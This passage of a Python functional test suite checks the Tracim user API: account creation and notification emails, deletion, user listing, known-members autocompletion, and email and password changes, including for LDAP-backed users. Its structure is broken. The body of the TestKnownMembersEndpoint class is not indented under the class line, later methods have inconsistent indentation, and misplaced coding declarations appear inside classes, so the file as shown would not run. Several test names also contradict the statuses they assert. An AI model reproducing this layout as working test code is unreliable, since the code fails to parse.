        assert headers["Subject"][0] == "[TRACIM] Created account"
    def test_api__create_user__ok_200__limited_admin_with_notif(self):
        # Email-only creation with notification: an auto-generated password
        # is set and the account email is sent.
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        params = {"email": "test@test.test", "email_notification": True}
        res = self.testapp.post_json("/api/v2/users", status=200, params=params)
        res = res.json_body
        assert res["user_id"]
        user_id = res["user_id"]
        assert res["created"]
        assert res["is_active"] is True
        assert res["profile"] == "users"
        assert res["email"] == "test@test.test"
        assert res["public_name"] == "test"
        assert res["timezone"] == ""
        assert res["lang"] is None
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert user.email == "test@test.test"
        assert user.password
        assert user.auth_type == AuthType.UNKNOWN
        # check mail received
        response = self.get_mailhog_mails()
        assert len(response) == 1
        headers = response[0]["Content"]["Headers"]
        assert headers["From"][0] == "Tracim Notifications <test_user_from+0@localhost>"
        assert headers["To"][0] == "test <test@test.test>"
        assert headers["Subject"][0] == "[TRACIM] Created account"
    def test_api_delete_user__ok_200__admin(self):
        # An admin can (soft-)delete another user.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        self.testapp.put("/api/v2/users/{}/trashed".format(user_id), status=204)
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200).json_body
        assert res["is_deleted"] is True
    def test_api_delete_user__err_400__admin_itself(self):
        # An admin must not be able to delete his own account.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        res = self.testapp.put("/api/v2/users/{}/trashed".format(admin.user_id), status=400)
        assert res.json_body["code"] == ErrorCode.USER_CANT_DELETE_HIMSELF
        res = self.testapp.get("/api/v2/users/{}".format(admin.user_id), status=200).json_body
        assert res["is_deleted"] is False
class TestUsersEndpoint(FunctionalTest):
    # NOTE: a misplaced "# -*- coding: utf-8 -*-" cookie was removed here;
    # coding declarations are only effective on the first two lines of a file.
    """
    Tests for GET /api/v2/users
    """
    fixtures = [BaseFixture]
    def test_api__get_user__ok_200__admin(self):
        # An admin can list every user of the instance.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        res = self.testapp.get("/api/v2/users", status=200)
        res = res.json_body
        assert len(res) == 2
        assert res[0]["user_id"] == test_user.user_id
        assert res[0]["public_name"] == test_user.display_name
        assert res[0]["avatar_url"] is None
        assert res[1]["user_id"] == admin.user_id
        assert res[1]["public_name"] == admin.display_name
        assert res[1]["avatar_url"] is None
    def test_api__get_user__err_403__normal_user(self):
        # A normal user is not allowed to list users.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        res = self.testapp.get("/api/v2/users", status=403)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestKnownMembersEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for GET /api/v2/users/{user_id}
"""
fixtures = [BaseFixture]
def test_api__get_user__ok_200__admin__by_name(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "bob"}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 2
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
assert res[1]["user_id"] == test_user2.user_id
assert res[1]["public_name"] == test_user2.display_name
assert res[1]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name_exclude_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "bob", "exclude_user_ids": str(test_user2.user_id)}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 1
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name_exclude_workspace(self):
    """
    Known-members autocompletion with exclude_workspace_ids: a user whose
    only workspace is in the excluded list must not appear in the results.
    """
    dbsession = get_tm_session(self.session_factory, transaction.manager)
    admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
    uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
    gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
    groups = [gapi.get_one_with_name("users")]
    test_user = uapi.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    test_user2 = uapi.create_user(
        email="test2@test2.test2",
        password="password",
        name="bob2",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    # Each user belongs to a different workspace; excluding workspace2
    # should filter test_user2 out of the autocomplete results.
    workspace = WorkspaceApi(
        current_user=admin, session=dbsession, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    workspace2 = WorkspaceApi(
        current_user=admin, session=dbsession, config=self.app_config
    ).create_workspace("test workspace2", save_now=True)
    role_api = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    role_api.create_one(test_user2, workspace2, UserRoleInWorkspace.READER, False)
    uapi.save(test_user)
    uapi.save(test_user2)
    transaction.commit()
    user_id = int(admin.user_id)
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    params = {"acp": "bob", "exclude_workspace_ids": str(workspace2.workspace_id)}
    res = self.testapp.get(
        "/api/v2/users/{user_id}/known_members".format(user_id=user_id),
        status=200,
        params=params,
    )
    res = res.json_body
    # Only test_user ("bob", member of the non-excluded workspace) remains.
    assert len(res) == 1
    assert res[0]["user_id"] == test_user.user_id
    assert res[0]["public_name"] == test_user.display_name
    assert res[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name_exclude_workspace_and_user(self):
    """
    Known-members autocompletion combining both filters: test_user2 is
    filtered through exclude_workspace_ids, test_user3 through
    exclude_user_ids, so only test_user remains.
    """
    dbsession = get_tm_session(self.session_factory, transaction.manager)
    admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
    uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
    gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
    groups = [gapi.get_one_with_name("users")]
    test_user = uapi.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    test_user2 = uapi.create_user(
        email="test2@test2.test2",
        password="password",
        name="bob2",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    test_user3 = uapi.create_user(
        email="test3@test3.test3",
        password="password",
        name="bob3",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    workspace = WorkspaceApi(
        current_user=admin, session=dbsession, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    workspace2 = WorkspaceApi(
        current_user=admin, session=dbsession, config=self.app_config
    ).create_workspace("test workspace2", save_now=True)
    role_api = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
    # test_user and test_user3 share workspace; test_user2 only has workspace2.
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    role_api.create_one(test_user2, workspace2, UserRoleInWorkspace.READER, False)
    role_api.create_one(test_user3, workspace, UserRoleInWorkspace.READER, False)
    # NOTE(review): test_user3 is not re-saved here, unlike the two others;
    # presumably harmless since create_user was called with do_save=True.
    uapi.save(test_user)
    uapi.save(test_user2)
    transaction.commit()
    user_id = int(admin.user_id)
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    params = {
        "acp": "bob",
        "exclude_workspace_ids": str(workspace2.workspace_id),
        "exclude_user_ids": str(test_user3.user_id),
    }
    res = self.testapp.get(
        "/api/v2/users/{user_id}/known_members".format(user_id=user_id),
        status=200,
        params=params,
    )
    res = res.json_body
    assert len(res) == 1
    assert res[0]["user_id"] == test_user.user_id
    assert res[0]["public_name"] == test_user.display_name
    assert res[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name__deactivated_members(self):
    """Deactivated users must not show up in known-members autocompletion."""
    session = get_tm_session(self.session_factory, transaction.manager)
    admin = session.query(User).filter(User.email == "admin@admin.admin").one()
    user_api = UserApi(current_user=admin, session=session, config=self.app_config)
    group_api = GroupApi(current_user=admin, session=session, config=self.app_config)
    groups = [group_api.get_one_with_name("users")]
    shared_kwargs = dict(
        password="password",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    active_user = user_api.create_user(email="test@test.test", name="bob", **shared_kwargs)
    disabled_user = user_api.create_user(
        email="test2@test2.test2", name="bob2", **shared_kwargs
    )
    # Deactivate the second user before committing; it must be filtered out.
    disabled_user.is_active = False
    user_api.save(active_user)
    user_api.save(disabled_user)
    transaction.commit()
    admin_id = int(admin.user_id)
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    response = self.testapp.get(
        "/api/v2/users/{user_id}/known_members".format(user_id=admin_id),
        status=200,
        params={"acp": "bob"},
    )
    members = response.json_body
    assert len(members) == 1
    assert members[0]["user_id"] == active_user.user_id
    assert members[0]["public_name"] == active_user.display_name
    assert members[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_email(self):
    """
    Known-members autocompletion matching on email: acp "test" matches the
    email addresses of both created users, so both are returned.
    """
    dbsession = get_tm_session(self.session_factory, transaction.manager)
    admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
    uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
    gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
    groups = [gapi.get_one_with_name("users")]
    test_user = uapi.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    test_user2 = uapi.create_user(
        email="test2@test2.test2",
        password="password",
        name="bob2",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    uapi.save(test_user)
    uapi.save(test_user2)
    transaction.commit()
    user_id = int(admin.user_id)
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    # "test" matches both emails but neither public name ("bob"/"bob2").
    params = {"acp": "test"}
    res = self.testapp.get(
        "/api/v2/users/{user_id}/known_members".format(user_id=user_id),
        status=200,
        params=params,
    )
    res = res.json_body
    assert len(res) == 2
    assert res[0]["user_id"] == test_user.user_id
    assert res[0]["public_name"] == test_user.display_name
    assert res[0]["avatar_url"] is None
    assert res[1]["user_id"] == test_user2.user_id
    assert res[1]["public_name"] == test_user2.display_name
    assert res[1]["avatar_url"] is None
def test_api__get_user__err_403__admin__too_small_acp(self):
    """
    An acp string of a single character is rejected by schema validation
    with a 400 GENERIC_SCHEMA_VALIDATION_ERROR.
    NOTE(review): the test name says err_403 but the asserted status is 400.
    """
    dbsession = get_tm_session(self.session_factory, transaction.manager)
    admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
    uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
    gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
    groups = [gapi.get_one_with_name("users")]
    test_user = uapi.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    # Second user created but deliberately unused: only the request matters.
    uapi.create_user(
        email="test2@test2.test2",
        password="password",
        name="bob2",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    uapi.save(test_user)
    transaction.commit()
    user_id = int(admin.user_id)
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    # One-character autocomplete prefix: below the allowed minimum length.
    params = {"acp": "t"}
    res = self.testapp.get(
        "/api/v2/users/{user_id}/known_members".format(user_id=user_id),
        status=400,
        params=params,
    )
    assert isinstance(res.json, dict)
    assert "code" in res.json.keys()
    assert res.json_body["code"] == ErrorCode.GENERIC_SCHEMA_VALIDATION_ERROR
def test_api__get_user__ok_200__normal_user_by_email(self):
    """
    A normal (non-admin) user only sees known members who share a workspace
    with him: test_user and test_user2 are in "test workspace", test_user3
    has no common workspace and is absent from the results.
    """
    dbsession = get_tm_session(self.session_factory, transaction.manager)
    admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
    uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
    gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
    groups = [gapi.get_one_with_name("users")]
    test_user = uapi.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    test_user2 = uapi.create_user(
        email="test2@test2.test2",
        password="password",
        name="bob2",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    test_user3 = uapi.create_user(
        email="test3@test3.test3",
        password="password",
        name="bob3",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    uapi.save(test_user)
    uapi.save(test_user2)
    uapi.save(test_user3)
    # Only test_user and test_user2 are made members of the workspace.
    workspace = WorkspaceApi(
        current_user=admin, session=dbsession, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    role_api = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    role_api.create_one(test_user2, workspace, UserRoleInWorkspace.READER, False)
    transaction.commit()
    user_id = int(test_user.user_id)
    # Authenticate as the normal user, not as admin.
    self.testapp.authorization = ("Basic", ("test@test.test", "password"))
    params = {"acp": "test"}
    res = self.testapp.get(
        "/api/v2/users/{user_id}/known_members".format(user_id=user_id),
        status=200,
        params=params,
    )
    res = res.json_body
    assert len(res) == 2
    assert res[0]["user_id"] == test_user.user_id
    assert res[0]["public_name"] == test_user.display_name
    assert res[0]["avatar_url"] is None
    assert res[1]["user_id"] == test_user2.user_id
    assert res[1]["public_name"] == test_user2.display_name
    assert res[1]["avatar_url"] is None
class TestSetEmailPasswordLdapEndpoint(FunctionalTest):
    # -*- coding: utf-8 -*-
    """
    Tests for PUT /api/v2/users/{user_id}/email
    Tests for PUT /api/v2/users/{user_id}/password
    for ldap user

    Both endpoints must refuse modifications for users whose authentication
    is delegated to an external backend (AuthType.LDAP).
    """

    fixtures = [BaseFixture]
    config_section = "functional_ldap_and_internal_test"

    def test_api__set_user_email__ok_200__ldap_user(self):
        """
        Changing the email of an LDAP-backed user is refused: the endpoint
        answers 400 with EXTERNAL_AUTH_USER_EMAIL_MODIFICATION_UNALLOWED and
        the email stays untouched.
        NOTE(review): the test name says ok_200 but the asserted status is 400.
        """
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        # LDAP users are created without a local password.
        test_user = uapi.create_user(
            email="test@test.test",
            password=None,
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            auth_type=AuthType.LDAP,
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"
        # Try to set a new email: must be rejected for an ldap user
        params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "admin@admin.admin"}
        res = self.testapp.put_json(
            "/api/v2/users/{}/email".format(user_id), params=params, status=400
        )
        assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_EMAIL_MODIFICATION_UNALLOWED
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"
        assert res["auth_type"] == "ldap"

    def test_api__set_user_password__ok_200__admin(self):
        """
        Changing the password of an LDAP-backed user is refused: the endpoint
        answers 400 with EXTERNAL_AUTH_USER_PASSWORD_MODIFICATION_UNALLOWED
        and the attempted password still does not validate afterwards.
        NOTE(review): the test name says ok_200 but the asserted status is 400.
        """
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password=None,
            auth_type=AuthType.LDAP,
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        user = uapi.get_one(user_id)
        assert not user.validate_password("mynewpassword")
        # Try to set a new password: must be rejected for an ldap user
        params = {
            "new_password": "mynewpassword",
            "new_password2": "mynewpassword",
            "loggedin_user_password": "admin@admin.admin",
        }
        res = self.testapp.put_json(
            "/api/v2/users/{}/password".format(user_id), params=params, status=400
        )
        assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_PASSWORD_MODIFICATION_UNALLOWED
        # Check After: re-fetch through a fresh session to avoid stale state.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert not user.validate_password("mynewpassword")
class TestSetEmailEndpoint(FunctionalTest):
    # -*- coding: utf-8 -*-
    """
    Tests for PUT /api/v2/users/{user_id}/email
    """

    fixtures = [BaseFixture]

    def test_api__set_user_email__ok_200__admin(self):
        """An admin can change another user's email address."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"
        # Set email
        params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "admin@admin.admin"}
        self.testapp.put_json("/api/v2/users/{}/email".format(user_id), params=params, status=200)
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "mysuperemail@email.fr"

    def test_api__set_user_email__err_400__admin_same_email(self):
        """Setting an email already used by another account fails with 400."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"
        # Set email to the admin's own address: already in DB, must fail.
        params = {"email": "admin@admin.admin", "loggedin_user_password": "admin@admin.admin"}
        res = self.testapp.put_json(
            "/api/v2/users/{}/email".format(user_id), params=params, status=400
        )
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.EMAIL_ALREADY_EXIST_IN_DB
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"

    def test_api__set_user_email__err_403__admin_wrong_password(self):
        """A wrong loggedin_user_password yields 403 and leaves the email unchanged."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"
        # Set email with a wrong confirmation password for the logged-in user.
        params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "badpassword"}
        res = self.testapp.put_json(
            "/api/v2/users/{}/email".format(user_id), params=params, status=403
        )
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.WRONG_USER_PASSWORD
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"

    def test_api__set_user_email__err_400__admin_string_is_not_email(self):
        """A syntactically invalid email is rejected by schema validation (400)."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"
        # Set email to a string that is not an email address.
        params = {"email": "thatisnotandemail", "loggedin_user_password": "admin@admin.admin"}
        res = self.testapp.put_json(
            "/api/v2/users/{}/email".format(user_id), params=params, status=400
        )
        # TODO - G.M - 2018-09-10 - Handled by marshmallow schema
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.GENERIC_SCHEMA_VALIDATION_ERROR
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"

    def test_api__set_user_email__ok_200__user_itself(self):
        """A user can change his own email and authenticate with the new one."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "test@test.test"
        # Set email
        params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "password"}
        self.testapp.put_json("/api/v2/users/{}/email".format(user_id), params=params, status=200)
        # Re-authenticate with the new email: the old credentials are gone.
        self.testapp.authorization = ("Basic", ("mysuperemail@email.fr", "password"))
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["email"] == "mysuperemail@email.fr"

    def test_api__set_user_email__err_403__other_normal_user(self):
        """A normal user cannot change another user's email (403)."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        test_user2 = uapi.create_user(
            email="test2@test2.test2",
            password="password",
            name="bob2",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user2)
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        # Authenticate as test_user2 and target test_user.
        self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
        # Set email
        params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "password"}
        res = self.testapp.put_json(
            "/api/v2/users/{}/email".format(user_id), params=params, status=403
        )
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetPasswordEndpoint(FunctionalTest):
    # -*- coding: utf-8 -*-
    """
    Tests for PUT /api/v2/users/{user_id}/password
    """

    fixtures = [BaseFixture]

    def test_api__set_user_password__ok_200__admin(self):
        """An admin can change another user's password (204, no body)."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
